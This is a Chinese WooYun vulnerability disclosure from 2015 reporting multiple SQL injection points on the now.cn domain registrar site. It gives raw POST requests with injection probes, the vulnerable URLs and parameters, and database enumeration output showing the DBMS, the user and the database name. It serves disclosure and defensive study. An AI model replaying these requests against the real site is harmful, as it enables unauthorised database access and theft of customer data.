当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148481

漏洞标题:域名安全之广东时代互联主站多处SQL注入打包

相关厂商:广东时代互联科技有限公司

漏洞作者: 路人甲

提交时间:2015-10-22 09:32

修复时间:2015-10-27 09:34

公开时间:2015-10-27 09:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

注入点一:

POST /GProduct/GOrder_submit.net HTTP/1.1
Content-Length: 342
Content-Type: application/x-www-form-urlencoded
Referer: http://www.now.cn:80/
Cookie: PHPSESSID=og8dknooforjuqnrnleclvo9vjaik2kg; IDReaded_C=%2C14664; reference=%21M2OT_236; NOWA=%2B236_241;
Host: www.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Submit2=%e7%a1%ae%20%e5%ae%9a&ACC=CN&ACity=San%20Francisco&AEmail=sample%40email.tst&AFax=317-317-3137&AMobile=987-65-4329&AName=jlsawjdd&AName_GB=jlsawjdd&AOrganization=1&AOrganization_GB=1&APC=1&ASP=1&AStreet=3137%20Laguna%20Street&AStreet1=3137%20Laguna%20Street&ATel=1&chrMemo%5b%5d=1'%22&chrProd=&IDProd=&showMess%5b%5d=&SSP=1&tld%5b%5d=
参数chrMemo%5b%5d 和 tld%5b%5d存在注入


第二处注入:

http://www.now.cn/news/media_list.php?page=%5c&seach=1
post参数:
Submit=%e6%90%9c%20%e7%b4%a2&page_variable_names=dmruvwgw&seach=1
page参数存在sql注入


第三处sql注入:

http://www.now.cn/web/template.php?Category=8&id=%5c&page=4&panel=112
id参数存在sql注入

漏洞证明:

web application technology: Apache, PHP 5.5.18
back-end DBMS: MySQL 5.1
current user: '[email protected].%'
current user is DBA: False
available databases [1]:
[*] db_now_net_cn


http://www.now.cn/domain-admin/bulkDNSChangeEpp_submit.net
post参数:
Submit=%e7%a1%ae%e5%ae%9a&agreement=*&backURL=domain_list.net%3ffIDDomainFolder%3dnull&button=%e6%b7%bb%e5%8a%a0%e6%9b%b4%e5%a4%9a%e5%9f%9f%e5%90%8d%e6%9c%8d%e5%8a%a1%e5%99%a8&Cancel=%e5%8f%96%e6%b6%88&domains=&NSList%5b%5d=1&SPassword=g00dPa%24%24w0rD&Su=%e8%bf%94%20%e5%9b%9e&Submit=%e4%bf%ae%20%e6%94%b9
参数agreement参数
backURL参数
button参数
Cancel参数
domains参数
NSList%5v%5d参数
SPassword参数
Su参数
Submit参数
都存在注入


web application technology: Apache, PHP 5.5.18
back-end DBMS: MySQL 5.1
current user: '[email protected].%'
current user is DBA: False
available databases [1]:
[*] db_now_net_cn

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-27 09:34

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无